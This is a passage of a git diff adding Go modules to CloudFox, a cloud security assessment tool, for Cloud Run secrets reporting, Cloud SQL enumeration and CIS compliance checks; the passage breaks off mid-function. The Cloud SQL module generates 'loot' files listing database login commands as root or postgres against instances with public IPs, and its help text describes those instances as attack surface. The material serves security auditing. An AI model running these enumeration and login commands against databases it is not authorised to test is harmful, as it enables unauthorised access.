[][]string + for _, job := range m.Jobs { + // Format default SA status + defaultSA := "No" + if job.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format env var count + envVars := "-" + if job.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", job.EnvVarCount) + } + + // Format secrets count + secretCount := job.SecretEnvVarCount + job.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format hardcoded secrets count + hardcoded := "No" + if len(job.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(job.HardcodedSecrets)) + } + + // Format last execution + lastExec := "-" + if job.LastExecution != "" { + lastExec = extractName(job.LastExecution) + } + + jobsBody = append(jobsBody, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + job.Name, + job.Region, + job.ServiceAccount, + defaultSA, + job.ContainerImage, + fmt.Sprintf("%d", job.TaskCount), + fmt.Sprintf("%d", job.Parallelism), + lastExec, + envVars, + secrets, + hardcoded, + }) + } + + // Hardcoded secrets table + secretsHeader := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Name", + "Region", + "Env Var", + "Secret Type", + } + + var secretsBody [][]string + // Add service secrets + for _, svc := range m.Services { + for _, secret := range svc.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + svc.ProjectID, + m.GetProjectName(svc.ProjectID), + "Service", + svc.Name, + svc.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(svc.Name, svc.ProjectID, svc.Region, secret.EnvVarName, "service") + } + } + // Add job secrets + for _, job := range m.Jobs { + for _, secret := range job.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + "Job", + job.Name, + job.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(job.Name, job.ProjectID, job.Region, secret.EnvVarName, "job") + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, + }) + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + output := CloudRunOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatIngress formats ingress settings for display +func formatIngress(ingress string) string { + switch ingress { + case "INGRESS_TRAFFIC_ALL": + return "ALL (Public)" + case "INGRESS_TRAFFIC_INTERNAL_ONLY": + return "INTERNAL" + case "INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER": + return "INT+LB" + default: + return ingress + } +} + +// extractName extracts just the name from a resource path +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// addSecretRemediationToLoot adds remediation commands for hardcoded secrets +func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, region, envVarName, resourceType string) { + secretName := strings.ToLower(strings.ReplaceAll(envVarName, "_", "-")) + + m.mu.Lock() + defer m.mu.Unlock() + + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# CRITICAL: Migrate hardcoded secret %s from %s %s\n"+ + "# 1. Create secret in Secret Manager:\n"+ + "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=- --project=%s\n"+ + "# 2. Grant access to Cloud Run service account:\n"+ + "gcloud secrets add-iam-policy-binding %s --member='serviceAccount:SERVICE_ACCOUNT' --role='roles/secretmanager.secretAccessor' --project=%s\n", + envVarName, resourceType, resourceName, + secretName, projectID, + secretName, projectID, + ) + + if resourceType == "service" { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. Update Cloud Run service to use secret:\n"+ + "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } else { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. Update Cloud Run job to use secret:\n"+ + "gcloud run jobs update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } +} diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go new file mode 100644 index 00000000..68861c87 --- /dev/null +++ b/gcp/commands/cloudsql.go @@ -0,0 +1,395 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudSQLService "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudSQLCommand = &cobra.Command{ + Use: globals.GCP_CLOUDSQL_MODULE_NAME, + Aliases: []string{"sql", "database", "db"}, + Short: "Enumerate Cloud SQL instances with security analysis", + Long: `Enumerate Cloud SQL instances across projects with security-relevant details. + +Features: +- Lists all Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Shows network configuration (public/private IP, authorized networks) +- Identifies publicly accessible databases +- Shows SSL/TLS configuration and requirements +- Checks backup and high availability configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows IAM database authentication status +- Shows password policy configuration +- Shows maintenance window settings +- Shows point-in-time recovery status +- Identifies common security misconfigurations +- Generates gcloud commands for further analysis + +Security Columns: +- PublicIP: Whether the instance has a public IP address +- RequireSSL: Whether SSL/TLS is required for connections +- AuthNetworks: Number of authorized network ranges +- Backups: Automated backup status +- PITR: Point-in-time recovery status +- Encryption: CMEK or Google-managed +- IAM Auth: IAM database authentication +- PwdPolicy: Password validation policy +- HA: High availability configuration +- Issues: Detected security misconfigurations + +Attack Surface: +- Public IPs expose database to internet scanning +- Missing SSL allows credential sniffing +- 0.0.0.0/0 in authorized networks = world accessible +- Default service accounts may have excessive permissions +- Google-managed encryption may not meet compliance +- Missing password policy allows weak passwords`, + Run: runGCPCloudSQLCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudSQLModule struct { + gcpinternal.BaseGCPModule + + Instances []CloudSQLService.SQLInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudSQLOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudSQLOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudSQLOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDSQL_MODULE_NAME) + if err != nil { + return + } + + module := &CloudSQLModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []CloudSQLService.SQLInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) + return + } + + // Count public instances + publicCount := 0 + for _, instance := range m.Instances { + if instance.HasPublicIP { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(m.Instances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud SQL instances in project: %s", projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + cs := CloudSQLService.New() + instances, err := cs.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDSQL_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud SQL in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudSQLModule) initializeLootFiles() { + m.LootMap["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { + dbType := getDatabaseType(instance.DatabaseVersion) + connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) + + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Region: %s\n"+ + "# Public IP: %s\n", + instance.Name, instance.DatabaseVersion, + instance.ProjectID, instance.Region, + publicIP, + ) + + // gcloud commands + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Connection commands based on database type + switch dbType { + case "mysql": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "mysql -h %s -u root -p\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:3306\n", + connectionInstance, + ) + case "postgres": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "psql -h %s -U postgres\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:5432\n", + connectionInstance, + ) + case "sqlserver": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "sqlcmd -S %s -U sqlserver\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:1433\n", + connectionInstance, + ) + } + + m.LootMap["cloudsql-commands"].Contents += "\n" +} + +// getDatabaseType returns the database type from version string +func getDatabaseType(version string) string { + switch { + case strings.HasPrefix(version, "MYSQL"): + return "mysql" + case strings.HasPrefix(version, "POSTGRES"): + return "postgres" + case strings.HasPrefix(version, "SQLSERVER"): + return "sqlserver" + default: + return "unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single merged table with one row per authorized network + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Database", + "Tier", + "Public IP", + "Private IP", + "SSL", + "Backups", + "PITR", + "Encrypt", + "IAM Auth", + "PwdPolicy", + "HA", + "Auth Network", + "CIDR", + "Public Access", + } + + var body [][]string + for _, instance := range m.Instances { + // Format encryption type + encryptionDisplay := instance.EncryptionType + if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { + encryptionDisplay = "Google" + } + + // Format public/private IPs + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + privateIP := instance.PrivateIP + if privateIP == "" { + privateIP = "-" + } + + // If instance has authorized networks, create one row per network + if len(instance.AuthorizedNetworks) > 0 { + for _, network := range instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + + networkName := network.Name + if networkName == "" { + networkName = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + networkName, + network.Value, + publicAccess, + }) + } + } else { + // Instance has no authorized networks - single row + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go new file mode 100644 index 00000000..587c3052 --- /dev/null +++ b/gcp/commands/compliancedashboard.go @@ -0,0 +1,1823 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" + +var GCPComplianceDashboardCommand = &cobra.Command{ + Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + Aliases: []string{"compliance", "cis", "benchmark"}, + Hidden: true, + Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", + Long: `Assess regulatory compliance posture against industry standards and security frameworks. + +Features: +- CIS GCP Foundation Benchmark assessment +- PCI-DSS control mapping +- SOC 2 control coverage analysis +- HIPAA compliance checks +- ISO 27001 control mapping +- Security Command Center compliance findings integration +- Organization policy compliance analysis +- Remediation guidance for failed controls + +Supported Frameworks: +- CIS GCP Foundation Benchmark v1.3/v2.0 +- PCI-DSS v3.2.1/v4.0 +- SOC 2 Type II +- HIPAA Security Rule +- ISO 27001:2013 +- NIST CSF + +Requires appropriate IAM permissions: +- roles/securitycenter.findingsViewer +- roles/orgpolicy.policyViewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPComplianceDashboardCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ComplianceControl struct { + ControlID string + Framework string + ControlName string + Description string + Severity string // CRITICAL, HIGH, MEDIUM, LOW + Status string // PASS, FAIL, MANUAL, NOT_APPLICABLE + ResourceCount int + PassCount int + FailCount int + ProjectID string + Details string + Remediation string + References []string +} + +type ComplianceFramework struct { + Name string + Version string + TotalControls int + PassedControls int + FailedControls int + ManualControls int + NAControls int + Score float64 +} + +type ComplianceFailure struct { + ControlID string + Framework string + ControlName string + Severity string + ResourceName string + ResourceType string + ProjectID string + Details string + Remediation string + RiskScore int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ComplianceDashboardModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Controls []ComplianceControl + Frameworks map[string]*ComplianceFramework + Failures []ComplianceFailure + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Cached data for compliance checks + orgPolicies map[string]bool + sccFindings map[string][]string // category -> resources + projectMetadata map[string]map[string]interface{} +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ComplianceDashboardOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComplianceDashboardOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComplianceDashboardOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPComplianceDashboardCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ComplianceDashboardModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Controls: []ComplianceControl{}, + Frameworks: make(map[string]*ComplianceFramework), + Failures: []ComplianceFailure{}, + LootMap: make(map[string]*internal.LootFile), + orgPolicies: make(map[string]bool), + sccFindings: make(map[string][]string), + projectMetadata: make(map[string]map[string]interface{}), + } + + // Initialize loot files + module.initializeLootFiles() + + // Initialize frameworks + module.initializeFrameworks() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Framework Initialization +// ------------------------------ +func (m *ComplianceDashboardModule) initializeFrameworks() { + m.Frameworks["CIS-GCP-1.3"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "1.3", + } + m.Frameworks["CIS-GCP-2.0"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "2.0", + } + m.Frameworks["PCI-DSS-4.0"] = &ComplianceFramework{ + Name: "PCI-DSS", + Version: "4.0", + } + m.Frameworks["SOC2"] = &ComplianceFramework{ + Name: "SOC 2 Type II", + Version: "2017", + } + m.Frameworks["HIPAA"] = &ComplianceFramework{ + Name: "HIPAA Security Rule", + Version: "2013", + } + m.Frameworks["ISO27001"] = &ComplianceFramework{ + Name: "ISO 27001", + Version: "2013", + } + m.Frameworks["NIST-CSF"] = &ComplianceFramework{ + Name: "NIST Cybersecurity Framework", + Version: "1.1", + } +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Assessing compliance posture against security frameworks...", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + // Step 1: Gather SCC findings for compliance mapping + m.gatherSCCFindings(ctx, logger) + + // Step 2: Gather organization policies + m.gatherOrgPolicies(ctx, logger) + + // Step 3: Run CIS GCP Benchmark checks + m.runCISBenchmarkChecks(ctx, logger) + + // Step 4: Map to other frameworks + m.mapToFrameworks() + + // Check results + totalControls := len(m.Controls) + if totalControls == 0 { + logger.InfoM("No compliance controls could be assessed", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + logger.InfoM("This could mean: (1) Insufficient permissions, (2) No resources to assess", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + return + } + + // Count by status + passCount := 0 + failCount := 0 + manualCount := 0 + for _, c := range m.Controls { + switch c.Status { + case "PASS": + passCount++ + case "FAIL": + failCount++ + case "MANUAL": + manualCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Assessed %d compliance control(s): %d PASS, %d FAIL, %d MANUAL", + totalControls, passCount, failCount, manualCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + if failCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d compliance control(s) failed", failCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Data Gathering +// ------------------------------ +func (m *ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { + client, err := securitycenter.NewClient(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Security Command Center client") + return + } + defer client.Close() + + for _, projectID := range m.ProjectIDs { + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, + } + + it := client.ListFindings(ctx, req) + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + if result.Finding != nil { + category := result.Finding.Category + m.mu.Lock() + m.sccFindings[category] = append(m.sccFindings[category], result.Finding.ResourceName) + m.mu.Unlock() + } + } + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Gathered %d SCC finding categories", len(m.sccFindings)), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } +} + +func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Resource Manager client") + return + } + + for _, projectID := range m.ProjectIDs { + project, err := crmService.Projects.Get(projectID).Do() + if err != nil { + continue + } + + m.mu.Lock() + m.projectMetadata[projectID] = map[string]interface{}{ + "name": project.Name, + "parent": project.Parent, + "labels": project.Labels, + } + m.mu.Unlock() + } +} + +// ------------------------------ +// CIS Benchmark Checks +// ------------------------------ +func (m *ComplianceDashboardModule) runCISBenchmarkChecks(ctx context.Context, logger internal.Logger) { + // CIS GCP Foundation Benchmark v1.3 / v2.0 Controls + + // Section 1: Identity and Access Management + m.checkCIS_1_1_ServiceAccountAdmin(ctx, logger) + m.checkCIS_1_2_ServiceAccountUser(ctx, logger) + m.checkCIS_1_3_ServiceAccountKeys(ctx, logger) + m.checkCIS_1_4_ServiceAccountTokenCreator(ctx, logger) + m.checkCIS_1_5_SeperationOfDuties(ctx, logger) + m.checkCIS_1_6_KMSRoles(ctx, logger) + m.checkCIS_1_7_SAKeyRotation(ctx, logger) + m.checkCIS_1_8_UserManagedKeys(ctx, logger) + m.checkCIS_1_9_CloudKMSSeparation(ctx, logger) + m.checkCIS_1_10_APIKeys(ctx, logger) + + // Section 2: Logging and Monitoring + m.checkCIS_2_1_CloudAuditLogging(ctx, logger) + m.checkCIS_2_2_LogSinks(ctx, logger) + m.checkCIS_2_3_RetentionPolicy(ctx, logger) + m.checkCIS_2_4_ProjectOwnership(ctx, logger) + m.checkCIS_2_5_AuditConfigChanges(ctx, logger) + m.checkCIS_2_6_SQLInstanceChanges(ctx, logger) + m.checkCIS_2_7_NetworkChanges(ctx, logger) + m.checkCIS_2_8_RouteChanges(ctx, logger) + m.checkCIS_2_9_FirewallChanges(ctx, logger) + m.checkCIS_2_10_VPCChanges(ctx, logger) + m.checkCIS_2_11_SQLServerAccessChanges(ctx, logger) + + // Section 3: Networking + m.checkCIS_3_1_DefaultNetwork(ctx, logger) + m.checkCIS_3_2_LegacyNetworks(ctx, logger) + m.checkCIS_3_3_DNSSEC(ctx, logger) + m.checkCIS_3_4_RSASHA1(ctx, logger) + m.checkCIS_3_5_RDPAccess(ctx, logger) + m.checkCIS_3_6_SSHAccess(ctx, logger) + m.checkCIS_3_7_FlowLogs(ctx, logger) + m.checkCIS_3_8_SSLPolicy(ctx, logger) + m.checkCIS_3_9_FirewallLogging(ctx, logger) + m.checkCIS_3_10_VPCNetworkPeering(ctx, logger) + + // Section 4: Virtual Machines + m.checkCIS_4_1_DefaultServiceAccount(ctx, logger) + m.checkCIS_4_2_BlockProjectWideSSH(ctx, logger) + m.checkCIS_4_3_OSLogin(ctx, logger) + m.checkCIS_4_4_SerialPortDisabled(ctx, logger) + m.checkCIS_4_5_IPForwarding(ctx, logger) + m.checkCIS_4_6_PublicIP(ctx, logger) + m.checkCIS_4_7_ShieldedVM(ctx, logger) + m.checkCIS_4_8_ComputeEncryption(ctx, logger) + m.checkCIS_4_9_ConfidentialComputing(ctx, logger) + + // Section 5: Storage + m.checkCIS_5_1_UniformBucketAccess(ctx, logger) + m.checkCIS_5_2_PublicBuckets(ctx, logger) + + // Section 6: Cloud SQL + m.checkCIS_6_1_SQLPublicIP(ctx, logger) + m.checkCIS_6_2_SQLAuthorizedNetworks(ctx, logger) + m.checkCIS_6_3_SQLSSLRequired(ctx, logger) + m.checkCIS_6_4_SQLNoPublicIP(ctx, logger) + m.checkCIS_6_5_SQLBackups(ctx, logger) + m.checkCIS_6_6_SQLContainedDB(ctx, logger) + m.checkCIS_6_7_SQLCrossDBAOwnership(ctx, logger) + + // Section 7: BigQuery + m.checkCIS_7_1_BigQueryCMEK(ctx, logger) + m.checkCIS_7_2_BigQueryTableCMEK(ctx, logger) + m.checkCIS_7_3_BigQueryDatasetPublic(ctx, logger) +} + +// CIS Control Check Implementations +func (m *ComplianceDashboardModule) checkCIS_1_1_ServiceAccountAdmin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Admin is not assigned at project level", + Description: "The Service Account Admin role should not be assigned at the project level", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review IAM bindings and remove Service Account Admin role at project level", + References: []string{"https://cloud.google.com/iam/docs/understanding-roles"}, + } + + // Check SCC findings for this category + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_ADMIN_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account Admin role", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "iam-binding", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_2_ServiceAccountUser(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account User is not assigned at project level", + Description: "Service Account User role grants impersonation capabilities and should be restricted", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Remove Service Account User role at project level, assign at service account level instead", + References: []string{"https://cloud.google.com/iam/docs/service-accounts"}, + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_USER_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account User role", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_3_ServiceAccountKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are not created", + Description: "User-managed keys are a security risk and should be avoided", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use workload identity or short-lived tokens instead of user-managed keys", + References: []string{"https://cloud.google.com/iam/docs/best-practices-for-securing-service-accounts"}, + } + + if findings, ok := m.sccFindings["USER_MANAGED_SERVICE_ACCOUNT_KEY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d user-managed service account keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "service-account-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_4_ServiceAccountTokenCreator(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Token Creator is properly scoped", + Description: "Token Creator role allows identity impersonation and should be carefully controlled", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review and restrict Service Account Token Creator role assignments", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func 